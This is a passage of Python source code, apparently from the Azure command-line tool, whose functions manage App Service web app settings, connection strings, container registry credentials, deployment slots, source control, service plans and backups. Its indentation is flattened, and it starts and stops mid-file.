settings_url = '{}/api/settings'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
headers = {
'Content-Type': 'application/octet-stream',
'Cache-Control': 'no-cache',
'User-Agent': get_az_user_agent()
}
import requests
response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3)
return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p].value,
'type':result.properties[p].type,
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
if not web_app:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
linux_fx = fx_version if web_app.reserved else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any([linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES]):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
python_version=None, net_framework_version=None,
java_version=None, java_container=None, java_container_version=None,
remote_debugging_enabled=None, web_sockets_enabled=None,
always_on=None, auto_heal_enabled=None,
use32_bit_worker_process=None,
min_tls_version=None,
http20_enabled=None,
app_command_line=None,
ftps_state=None,
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if pre_warmed_instance_count is not None:
pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
int_flags = ['pre_warmed_instance_count', 'number_of_workers']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
result = {}
for s in generic_configurations:
try:
result.update(get_json_object(s))
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
setattr(configs, config_name, value)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
return result.properties
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quots used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
HostNameBinding = cmd.get_models('HostNameBinding')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(location=webapp.location, site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding,
slot)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
SslState = cmd.get_models('SslState')
# logics here are ported from portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
site_config = get_site_configs(cmd, resource_group_name, webapp, None)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
# if it is a Windows Container site, at least pass the necessary
# app settings to perform the container image validation:
if configuration_source and site_config.windows_fx_version:
# get settings from the source
clone_from_prod = configuration_source.lower() == webapp.lower()
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings', src_slot)
settings = []
for k, v in app_settings.properties.items():
if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
"DOCKER_REGISTRY_SERVER_URL"):
settings.append(NameValuePair(name=k, value=v))
slot_def.site_config = SiteConfig(app_settings=settings)
poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
Site = cmd.get_models('Site')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.create_or_update_slot(resource_group_name, name, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings.properties, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings.properties, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, cd_app_type=None,
app_working_dir=None, nodejs_task_runner=None, python_framework=None,
python_version=None, cd_account_create=None, cd_project_url=None, test=None,
slot_swap=None, private_repo_username=None, private_repo_password=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
if cd_project_url:
# Add default values
cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
python_framework = 'Django' if python_framework is None else python_framework
python_version = 'Python 3.5.3 x86' if python_version is None else python_version
webapp_list = None if test is None else list_webapp(resource_group_name)
vsts_provider = VstsContinuousDeliveryProvider()
cd_app_type_details = {
'cd_app_type': cd_app_type,
'app_working_dir': app_working_dir,
'nodejs_task_runner': nodejs_task_runner,
'python_framework': python_framework,
'python_version': python_version
}
try:
status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
branch, git_token, slot_swap, cd_app_type_details,
cd_project_url, cd_account_create, location, test,
private_repo_username, private_repo_password, webapp_list)
except RuntimeError as ex:
raise CLIError(ex)
logger.warning(status.status_message)
return status
non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
python_version, cd_account_create, test, slot_swap]
if any(non_vsts_params):
raise CLIError('Following parameters are of no use when cd_project_url is None: ' +
'cd_app_type, app_working_dir, nodejs_task_runner, python_framework,' +
'python_version, cd_account_create, test, slot_swap')
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
# for non server errors(50x), just throw; otherwise retry 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
the command will clean up existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
SiteConfigResource = cmd.get_models('SiteConfigResource')
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
site_config = SiteConfigResource(location=location)
site_config.scm_type = 'LocalGit'
if slot is None:
client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
else:
client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
site_config, slot)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False):
HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
_validate_asp_sku(app_service_environment, sku)
if is_linux and hyper_v:
raise CLIError('usage error: --is-linux | --hyper-v')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
raise CLIError('Windows containers is not yet supported in app service environment')
ase_id = _validate_app_service_environment_id(cmd.cli_ctx, app_service_environment, resource_group_name)
ase_def = HostingEnvironmentProfile(id=ase_id)
ase_list = client.app_service_environments.list()
ase_found = False
for ase in ase_list:
if ase.id.lower() == ase_id.lower():
location = ase.location
ase_found = True
break
if not ase_found:
raise CLIError("App service environment '{}' not found in subscription.".format(ase_id))
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
return sdk_no_wait(no_wait, client.app_service_plans.create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
if number_of_workers is None and sku is None:
logger.warning('No update is done. Specify --sku and/or --number-of-workers.')
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
return instance
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(cmd, instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
BackupRequest = cmd.get_models('BackupRequest')
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_request = BackupRequest(backup_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except DefaultErrorResponseException:
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
RestoreRequest = cmd.get_models('RestoreRequest')
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
